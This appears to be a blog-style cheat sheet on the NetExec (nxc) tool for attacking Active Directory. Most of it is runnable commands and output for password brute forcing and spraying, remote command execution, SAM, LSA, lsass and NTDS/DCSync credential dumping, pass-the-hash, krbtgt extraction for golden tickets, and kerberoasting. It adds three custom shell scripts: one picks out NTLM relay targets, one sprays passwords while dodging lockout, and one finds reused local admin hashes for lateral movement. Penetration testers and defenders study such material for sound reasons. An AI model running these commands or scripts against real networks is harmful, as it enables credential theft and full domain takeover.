NetExec-overview-AD
My notes on the NetExec (nxc) tool, focused on Active Directory.
Enumeration:
nxc smb -h
nxc smb <URL>
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name:DC-DC) (domain:dc.local) (signing:True) (SMBv1:False)
<URL>: the target (an IP, hostname, CIDR range or a file of targets; the same placeholder is used throughout these notes)
name: the computer name
domain: the domain name
signing:False: SMB signing is not required, so the host is a candidate for NTLM relay
SMBv1:True: SMBv1 is still enabled, so check for MS17-010 (EternalBlue) with the ms17-010 module (-M ms17-010)
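When nxc is run against a whole range, the banner lines are what you triage first. The script below is an added example (my own helper, not part of NetExec) that reads nxc output on stdin and pulls out relay candidates, SMBv1 hosts and successful logons. The field positions (SMB, host, port, name, status marker) and the sample output are assumptions modelled on the line format above.

```sh
#!/bin/sh
# Added example (not part of NetExec): triage the banner and logon lines that
# `nxc smb <targets>` prints. Reads nxc output on stdin; the field positions
# and the sample below are assumptions based on the line format in the notes.

# Hosts that do not require SMB signing: NTLM relay candidates.
relay_targets() {
    awk '$1 == "SMB" && /\(signing: ?False\)/ { print $2 }'
}

# Hosts still speaking SMBv1: worth a check with `-M ms17-010`.
smbv1_hosts() {
    awk '$1 == "SMB" && /\(SMBv1: ?True\)/ { print $2 }'
}

# Successful logons ([+] lines that carry user:secret): prints host,
# domain\user:secret and the (Pwn3d!) marker nxc adds for local admins.
valid_logons() {
    awk '$1 == "SMB" && $5 == "[+]" && $6 ~ /:/ {
            printf "%s %s%s\n", $2, $6, ($7 != "" ? " " $7 : "")
         }'
}

# Constructed sample output for three hosts (assumed nxc line format).
SAMPLE_OUTPUT='SMB 10.10.10.5 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:lab.local) (signing:True) (SMBv1:False)
SMB 10.10.10.20 445 WS01 [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:lab.local) (signing:False) (SMBv1:False)
SMB 10.10.10.30 445 FS01 [*] Windows 6.1 Build 7601 x64 (name:FS01) (domain:lab.local) (signing:False) (SMBv1:True)
SMB 10.10.10.5 445 DC01 [-] lab.local\j.doe:Summer2023! STATUS_LOGON_FAILURE
SMB 10.10.10.20 445 WS01 [+] lab.local\j.doe:Summer2023! (Pwn3d!)
SMB 10.10.10.30 445 FS01 [+] lab.local\j.doe:Summer2023!'

# Usage with real output:  nxc smb 10.10.10.0/24 | relay_targets
printf '%s\n' "$SAMPLE_OUTPUT" | relay_targets
printf '%s\n' "$SAMPLE_OUTPUT" | smbv1_hosts
printf '%s\n' "$SAMPLE_OUTPUT" | valid_logons
```

The relay list is the input for ntlmrelayx-style attacks, and the SMBv1 list is what the ms17-010 module should be pointed at; both come for free from the first unauthenticated sweep.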
Check for accounts (guest / null session):
nxc smb <URL> -u 'guest' -p ''
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name:DC-DC) (domain:dc.local) (signing:True) (SMBv1:False)
SMB <URL> 445 DC-DC [-] dc.local\guest: STATUS_ACCOUNT_DISABLED
Guest is disabled here; a null session (-u '' -p '') is worth trying as well. If either works, --shares, --users and --rid-brute may already return results without real credentials.
With a password file (one password per line; -u and -p each accept a single value or a file):
nxc smb <URL> -u 'user.name' -p 'password_file.txt'
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name:DC-DC) (domain:dc.local) (signing:True) (SMBv1:False)
SMB <URL> 445 DC-DC [-] dc.local\name.surname:password STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [-] dc.local\name.surname:Password123 STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [-] dc.local\name.surname:Summer2023! STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [+] dc.local\name.surname:SeekTheCheapestRoute!
Every [-] line counts as a failed logon for that user, so keep the file short enough to stay under the domain's lockout threshold.
Pass the password (spray one found password over a user list):
nxc smb <URL> -u 'user_file.txt' -p '<found_password>' --continue-on-success
By default nxc stops after the first valid login; --continue-on-success tests every user. Check the lockout threshold first with --pass-pol (needs one valid credential), and use --no-bruteforce when a user file and a password file should be paired line by line instead of tried in every combination.
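The wrapper below is an added example (my own script, not part of NetExec) that ties the two steps together: it reads the lockout threshold from --pass-pol using the credential already found, refuses to spray when the number of passwords per user would not stay below it, and otherwise sprays with --continue-on-success and prints the hits. It assumes nxc is on PATH and that the --pass-pol output contains an "Account Lockout Threshold:" line; that line format and the sample data are assumptions.

```sh
#!/bin/sh
# Added example (not part of NetExec): spray one password over a user list
# only after checking the domain lockout policy. Assumes nxc on PATH, one
# already-valid credential to read the policy with, and that --pass-pol
# prints an "Account Lockout Threshold:" line (format assumed).

# Print the lockout threshold from --pass-pol output on stdin:
# a number, 0 when the policy says None, -1 when no such line was seen.
lockout_threshold() {
    awk -F': *' '/Account Lockout Threshold/ && !found {
                    v = $2; sub(/[^0-9].*/, "", v)
                    if (v == "") v = 0
                    print v + 0; found = 1
                 }
                 END { if (!found) print -1 }'
}

# True when $2 attempts per user stay below threshold $1, keeping one
# attempt in hand; an unknown policy (-1) is treated as unsafe.
spray_is_safe() {
    threshold=$1; attempts=$2
    if [ "$threshold" -eq 0 ]; then return 0; fi
    if [ "$threshold" -lt 0 ]; then return 1; fi
    [ "$attempts" -lt "$threshold" ]
}

# spray TARGET KNOWN_USER KNOWN_PASS USERS_FILE PASSWORDS_FILE
# Prints "host domain\user:password" for every successful logon.
spray() {
    target=$1; known_user=$2; known_pass=$3; users=$4; passwords=$5
    attempts=$(awk 'NF { n++ } END { print n + 0 }' "$passwords")
    threshold=$(nxc smb "$target" -u "$known_user" -p "$known_pass" --pass-pol | lockout_threshold)
    if ! spray_is_safe "$threshold" "$attempts"; then
        echo "refusing to spray: $attempts password(s) per user vs lockout threshold $threshold" >&2
        return 1
    fi
    # --continue-on-success keeps testing users after the first hit.
    nxc smb "$target" -u "$users" -p "$passwords" --continue-on-success |
        awk '$1 == "SMB" && $5 == "[+]" && $6 ~ /:/ { print $2, $6 }'
}

# Usage:  spray dc.local j.doe 'Summer2023!' users.txt passwords.txt
```

The threshold check is deliberately one attempt short of the policy so that a user who already has a failed logon from somewhere else is not locked out by the spray; when the policy cannot be read the script refuses rather than guessing.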
With credentials (enumerate users and groups):
nxc smb <URL> -u 'user.name' -p 'found_password' --rid-brute
--rid-brute cycles through RIDs and resolves each SID, which lists users and groups even when direct queries are restricted; --users, --groups and --shares ask for the same information directly.
With --log <file> the output of a single run can be written to a specific file.
config file: /home/kali/.nxc/nxc.conf (the integration passwords below are stored in plaintext; change the defaults if BloodHound, Empire or Metasploit are enabled)
[nxc]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False <--- if True generates log in the "/home/kali/.nxc/logs" folder
ignore_opsec = True
host_info_colors = ["green", "red", "yellow", "cyan"]
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = password123
[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123
Kerberos Auth:
nxc smb <URL> -u 'user.name' -p 'found_password' -k
-k requests a TGT with the password and authenticates over Kerberos; use the host's FQDN as <URL> so nxc can request a service ticket for cifs/<fqdn>.
If you have a TGT (ccache):
export KRB5CCNAME=ticket.ccache
nxc smb <URL> --use-kcache
The user and domain are read from the ticket, so -u/-p are not needed; <URL> must again be the host's FQDN.
Execute commands:
nxc smb <URL> -u 'user.name' -p 'found_password' -x 'command' <--- cmd.exe
nxc smb <URL> -u 'user.name' -p 'found_password' -X 'command' <--- PowerShell (nxc wraps the command in an encoded PowerShell call; --obfs obfuscates it)
nxc smb <URL> -u 'user.name' -p 'found_password' -x 'powershell.exe -c "GCI C:\\"' <--- PowerShell started from cmd, sent as-is without encoding or obfuscation
Execution needs local admin on the target. nxc tries wmiexec, atexec and smbexec in turn; --exec-method picks one explicitly (smbexec creates a service on the host and is the noisiest).
If you got admin, the first thing to do is dump the SAM and the LSA secrets:
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --sam <--- local account NT hashes
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --lsa <--- LSA secrets: cached domain logons (DCC2), service account passwords, the machine account
Auth with hash (pass-the-hash):
nxc smb <URL> -u 'USER-DC$' -H <hash>
-H takes the NT hash (or LM:NT). USER-DC$ is a machine account, which is why the computer name is needed: computer accounts are named <hostname>$. For a local account dumped from the SAM add --local-auth.
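Once --sam has been run against several hosts, the useful question is which hashes work where. The script below is an added example (my own helper, not part of NetExec) that parses --sam output into "host user nt_hash" lines, drops the empty-password hash, and reports hashes shared between hosts; a reused local Administrator hash means the same -H works on every one of them. The pwdump-style line layout after the host columns and the sample data are assumptions.

```sh
#!/bin/sh
# Added example (not part of NetExec): turn `nxc smb ... --sam` output from
# several hosts into reusable NT hashes and spot the ones shared between
# hosts. The pwdump-style line format after the host columns and the sample
# below are assumptions.

# Print "host user nt_hash" for every SAM entry, skipping the empty-password hash.
sam_to_ntlm() {
    awk '$1 == "SMB" && $5 ~ /^[^:]+:[0-9]+:[0-9a-f]+:[0-9a-f]+:::$/ {
            split($5, f, ":")
            if (length(f[4]) == 32 && f[4] != "31d6cfe0d16ae931b73c59d7e0c089c0")
                print $2, f[1], f[4]
         }'
}

# Print "user:nt_hash host1,host2,..." for hashes seen on more than one host.
reused_ntlm() {
    sam_to_ntlm | awk '{
            key = $2 ":" $3
            if (key in hosts) hosts[key] = hosts[key] "," $1; else hosts[key] = $1
            seen[key]++
        }
        END { for (k in seen) if (seen[k] > 1) print k, hosts[k] }' | sort
}

# Constructed sample: two hosts dumped with the same domain credential
# (hash values are sample data, not real dumps).
SAMPLE_SAM='SMB 10.10.10.20 445 WS01 [+] lab.local\j.doe:Summer2023! (Pwn3d!)
SMB 10.10.10.20 445 WS01 [+] Dumping SAM hashes
SMB 10.10.10.20 445 WS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB 10.10.10.20 445 WS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.20 445 WS01 helpdesk:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
SMB 10.10.10.30 445 FS01 [+] lab.local\j.doe:Summer2023! (Pwn3d!)
SMB 10.10.10.30 445 FS01 [+] Dumping SAM hashes
SMB 10.10.10.30 445 FS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB 10.10.10.30 445 FS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# Usage with real output:  nxc smb 10.10.10.0/24 -u j.doe -p 'Summer2023!' --sam | reused_ntlm
printf '%s\n' "$SAMPLE_SAM" | sam_to_ntlm
printf '%s\n' "$SAMPLE_SAM" | reused_ntlm
```

A reused hash goes straight back into nxc as nxc smb <range> -u Administrator -H <nt_hash> --local-auth, which shows every host that accepts it; the per-host lines are also the right input for hashcat mode 1000 if a plaintext is wanted.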
ntds dump:
nxc smb <URL> -u 'USER-DC$' -H <hash> --ntds
ntds dump of a single user (better krbtgt):
nxc smb <URL> -u 'USER-DC$' -H <hash> --ntds --user krbtgt
--ntds replicates the hashes over DRSUAPI (DCSync) by default, which needs replication rights; a DC's own machine account has them. --ntds vss dumps from a volume shadow copy instead. With the hash of krbtgt plus the domain SID we can forge our own tickets (golden ticket, e.g. with impacket's ticketer.py).
Modules (nxc smb -L lists them, -M <module> --options shows a module's options):
nxc smb <URL> -u 'Administrator' -p 'admin_pass' -M nanodump
Dumps lsass with nanodump and parses the result with pypykatz
nxc smb <URL> -u 'Administrator' -p 'admin_pass' -M lsassy
Dumps lsass and parses the result remotely with lsassy
Both open a handle to lsass, which most EDRs watch closely.
Put files on the target over SMB (the remote path is relative to the C$ share, so '\\file.txt' lands in C:\):
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --put-file file.txt '\\file.txt'
--get-file '\\file.txt' file.txt does the reverse.
LDAP
nxc ldap -L <--- list modules
Kerberoast:
nxc ldap <URL> -u 'Administrator' -p 'admin_pass' --kerberoasting outfile.txt
Any domain user can request these tickets, admin is not needed. outfile.txt holds hashcat-ready $krb5tgs$ hashes (RC4 ones are mode 13100). --asreproast outfile.txt does the same for accounts without Kerberos pre-authentication (mode 18200).
This post is licensed under CC BY 4.0 by the author.